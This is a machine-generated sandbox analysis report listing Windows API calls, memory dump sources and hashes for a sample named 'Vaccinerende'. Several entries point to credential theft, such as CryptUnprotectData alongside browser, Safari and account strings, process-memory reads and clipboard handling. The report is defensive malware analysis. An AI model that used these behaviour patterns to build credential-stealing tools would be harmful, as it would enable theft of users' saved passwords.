                                            APIs
                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$PointerRead
                                            • String ID:
                                            • API String ID: 3154509469-0
                                            APIs
                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                            • String ID:
                                            • API String ID: 4232544981-0
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            APIs
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$FileModuleName
                                            • String ID:
                                            • API String ID: 3859505661-0
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            APIs
                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            APIs
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            APIs
                                            • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: EnumNamesResource
                                            • String ID:
                                            • API String ID: 3334572018-0
                                            APIs
                                            • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            APIs
                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CloseFind
                                            • String ID:
                                            • API String ID: 1863332320-0
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            APIs
                                            • memset.MSVCRT ref: 004095FC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                            APIs
                                            • memset.MSVCRT ref: 00445426
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            Similarity
                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                            APIs
                                            Similarity
                                            • API ID: _wcsicmp
                                            APIs
                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Similarity
                                            • API ID: File$CloseCreateErrorHandleLastRead
                                            APIs
                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                            Similarity
                                            • API ID: ??2@??3@
                                            APIs
                                            Similarity
                                            • API ID: free
                                            APIs
                                            Similarity
                                            • API ID: free
                                            APIs
                                            Similarity
                                            • API ID: free
                                            APIs
                                            • EmptyClipboard.USER32 ref: 004098EC
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                            • GetLastError.KERNEL32 ref: 0040995D
                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                            • GetLastError.KERNEL32 ref: 00409974
                                            • CloseClipboard.USER32 ref: 0040997D
                                            Similarity
                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                            APIs
                                            • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                            • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                            Strings
                                            Similarity
                                            • API ID: Library$AddressFreeLoadMessageProc
                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                            APIs
                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                            • GetTickCount.KERNEL32 ref: 0041887D
                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                            Similarity
                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                            APIs
                                            • EmptyClipboard.USER32 ref: 00409882
                                            • wcslen.MSVCRT ref: 0040988F
                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                            • CloseClipboard.USER32 ref: 004098D7
                                            Similarity
                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                            APIs
                                            • GetLastError.KERNEL32 ref: 004182D7
                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                            • LocalFree.KERNEL32(?), ref: 00418342
                                            • free.MSVCRT ref: 00418370
                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                            Strings
                                            Similarity
                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                            • String ID: OsError 0x%x (%u)
                                            Similarity
                                            • API ID: ??2@??3@memcpymemset
                                            APIs
                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                            Similarity
                                            • API ID: NtdllProc_Window
                                            • String ID:
                                            • API String ID: 4255912815-0
                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                            APIs
                                            • _wcsicmp.MSVCRT ref: 004022A6
                                            • _wcsicmp.MSVCRT ref: 004022D7
                                            • _wcsicmp.MSVCRT ref: 00402305
                                            • _wcsicmp.MSVCRT ref: 00402333
                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                            • memset.MSVCRT ref: 0040265F
                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                            Strings
                                            Similarity
                                            • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                            • API String ID: 2929817778-1134094380
                                            • Opcode ID: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                            • Opcode Fuzzy Hash: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                            • String ID: :stringdata$ftp://$http://$https://
                                            • API String ID: 2787044678-1921111777
                                            • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                            • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                            • GetDC.USER32 ref: 004140E3
                                            • wcslen.MSVCRT ref: 00414123
                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                            • _snwprintf.MSVCRT ref: 00414244
                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                            Strings
                                            Similarity
                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                            • String ID: %s:$EDIT$STATIC
                                            • API String ID: 2080319088-3046471546
                                            • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                            • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                            APIs
                                            • EndDialog.USER32(?,?), ref: 00413221
                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                            • memset.MSVCRT ref: 00413292
                                            • memset.MSVCRT ref: 004132B4
                                            • memset.MSVCRT ref: 004132CD
                                            • memset.MSVCRT ref: 004132E1
                                            • memset.MSVCRT ref: 004132FB
                                            • memset.MSVCRT ref: 00413310
                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                            • memset.MSVCRT ref: 004133C0
                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                            • wcscpy.MSVCRT ref: 0041341F
                                            • _snwprintf.MSVCRT ref: 0041348E
                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                            • SetFocus.USER32(00000000), ref: 004134B7
                                            Strings
